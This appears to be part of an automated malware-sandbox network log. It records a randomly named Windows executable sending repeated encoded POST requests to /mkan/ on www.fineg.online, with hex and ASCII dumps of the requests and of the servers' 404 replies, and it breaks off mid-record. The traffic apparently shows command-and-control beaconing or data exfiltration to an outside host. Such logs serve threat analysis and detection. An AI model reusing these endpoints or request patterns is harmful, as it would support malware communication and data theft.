                      Accept-Language: en-us
                      Connection: close
                      Host: www.d55dg.top
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:46:41.453099012 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:41 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Sep 3, 2024 12:46:41.453140974 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:41 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.449750162.0.239.141801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:00.048372030 CEST714OUTPOST /mkan/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.fineg.online
                      Origin: http://www.fineg.online
                      Referer: http://www.fineg.online/mkan/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 71 79 38 4f 6b 42 52 35 77 6a 31 34 4f 54 4f 57 57 4b 4d 34 50 76 42 44 73 37 67 68 63 6f 6d 77 68 45 43 6f 4a 39 44 39 30 48 43 57 66 50 41 49 72 2b 64 41 45 6a 6b 4e 64 35 64 64 65 61 4b 44 35 70 43 32 2f 51 42 2b 67 77 42 78 71 61 73 69 39 6b 4d 64 59 71 35 55 47 35 44 32 6b 71 6e 61 76 44 34 6a 57 33 76 6f 67 32 33 72 59 6f 7a 50 35 34 65 50 65 6b 58 35 4d 6f 63 68 6a 4c 43 2f 53 42 4d 49 57 4a 51 78 41 35 6c 32 78 54 47 4f 66 59 4a 36 41 4b 71 44 38 49 33 61 52 74 53 45 75 33 4d 43 48 6c 58 7a 61 58 69 78 63 70 45 38 69 35 2b 45 46 51 3d 3d
                      Data Ascii: TJY8=z8pzi1wICkJUqy8OkBR5wj14OTOWWKM4PvBDs7ghcomwhECoJ9D90HCWfPAIr+dAEjkNd5ddeaKD5pC2/QB+gwBxqasi9kMdYq5UG5D2kqnavD4jW3vog23rYozP54ePekX5MochjLC/SBMIWJQxA5l2xTGOfYJ6AKqD8I3aRtSEu3MCHlXzaXixcpE8i5+EFQ==
                      Sep 3, 2024 12:47:00.593050003 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:00 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:00.593072891 CEST224INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                      Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2
                      Sep 3, 2024 12:47:00.593085051 CEST1236INData Raw: 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 32 30 20 33 30 37 2e
                      Data Ascii: " d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59.8 282.4h-3L50
                      Sep 3, 2024 12:47:00.593096972 CEST1236INData Raw: 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                      Data Ascii: " d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M279.8 282
                      Sep 3, 2024 12:47:00.593115091 CEST1236INData Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34
                      Data Ascii: <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/> <path class="
                      Sep 3, 2024 12:47:00.593126059 CEST1236INData Raw: 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20
                      Data Ascii: st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M790 282.4h-3l-
                      Sep 3, 2024 12:47:00.593137026 CEST1236INData Raw: 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73
                      Data Ascii: 25.2h3z"/> <path class="st2" d="M600 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M590 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M580 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M570 282.4h-3l-6.8 25.2h3z"/> <path c
                      Sep 3, 2024 12:47:00.593148947 CEST552INData Raw: 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20
                      Data Ascii: -3l-6.8 25.2h3z"/> <path class="st2" d="M-330.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-320.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-310.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-300.2 282.4h-3l
                      Sep 3, 2024 12:47:00.593370914 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                      Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                      Sep 3, 2024 12:47:00.593441010 CEST1236INData Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                      Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-.2 282.4h-3l
                      Sep 3, 2024 12:47:00.598174095 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 32 30 20 32
                      Data Ascii: ath class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.449751162.0.239.141801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:02.671083927 CEST734OUTPOST /mkan/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.fineg.online
                      Origin: http://www.fineg.online
                      Referer: http://www.fineg.online/mkan/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 53 77 76 47 61 6f 49 2f 72 39 7a 48 43 57 4c 66 41 4a 32 75 64 78 45 6a 6f 46 64 34 68 64 65 61 65 44 35 74 4b 32 2f 68 42 35 69 67 42 7a 68 36 73 6b 67 30 4d 64 59 71 35 55 47 36 2b 74 6b 70 58 61 76 54 6f 6a 45 43 54 72 38 6d 33 71 66 6f 7a 50 79 59 65 4c 65 6b 57 65 4d 70 42 70 6a 4a 71 2f 53 42 38 49 58 64 39 6e 56 70 6c 77 31 54 48 70 63 49 34 46 4a 35 58 71 35 5a 48 2f 50 64 43 35 76 78 64 59 57 55 32 6b 49 58 47 43 42 75 4e 49 76 36 44 4e 65 52 48 77 63 35 4f 2b 34 57 69 70 66 49 37 41 2b 76 37 74 42 70 49 3d
                      Data Ascii: TJY8=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaSwvGaoI/r9zHCWLfAJ2udxEjoFd4hdeaeD5tK2/hB5igBzh6skg0MdYq5UG6+tkpXavTojECTr8m3qfozPyYeLekWeMpBpjJq/SB8IXd9nVplw1THpcI4FJ5Xq5ZH/PdC5vxdYWU2kIXGCBuNIv6DNeRHwc5O+4WipfI7A+v7tBpI=
                      Sep 3, 2024 12:47:03.449151993 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:03 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:03.449193954 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                      Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                      Sep 3, 2024 12:47:03.449209929 CEST448INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                      Sep 3, 2024 12:47:03.449220896 CEST1236INData Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                      Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                      Sep 3, 2024 12:47:03.449233055 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                      Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                      Sep 3, 2024 12:47:03.449244022 CEST448INData Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                      Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                      Sep 3, 2024 12:47:03.449258089 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                      Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                      Sep 3, 2024 12:47:03.449278116 CEST1236INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                      Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/> <path class="s
                      Sep 3, 2024 12:47:03.449290037 CEST448INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                      Data Ascii: h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h-3l-6.8 25.2h3z
                      Sep 3, 2024 12:47:03.449302912 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                      Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:03.449915886 CEST1236INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.449752162.0.239.141801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:05.219326019 CEST10816OUTPOST /mkan/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.fineg.online
                      Origin: http://www.fineg.online
                      Referer: http://www.fineg.online/mkan/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 71 77 76 31 53 6f 4a 65 72 39 79 48 43 57 58 76 41 4d 32 75 64 6f 45 6a 77 42 64 34 73 69 65 59 6d 44 34 50 53 32 33 31 64 35 6f 67 42 7a 75 61 73 6c 39 6b 4d 79 59 72 49 64 47 36 75 74 6b 70 58 61 76 56 55 6a 47 58 76 72 2b 6d 33 72 59 6f 7a 54 35 34 65 6a 65 6b 2f 68 4d 70 55 4c 6a 34 4b 2f 54 6c 51 49 51 6f 52 6e 55 4a 6c 79 79 54 48 78 63 49 30 6b 4a 35 62 41 35 5a 7a 42 50 66 65 35 72 6e 6f 73 4d 58 6d 76 66 57 44 45 55 2b 6b 69 74 71 58 4c 62 68 4c 72 59 72 4f 63 76 43 36 39 48 4b 44 4f 74 39 6e 32 61 65 69 74 55 67 64 45 43 6e 73 37 38 36 35 7a 36 59 57 78 74 78 35 35 48 76 74 79 44 77 34 4d 59 35 5a 35 54 6f 37 4c 2b 50 6b 45 4f 56 2b 6d 61 6f 57 78 37 54 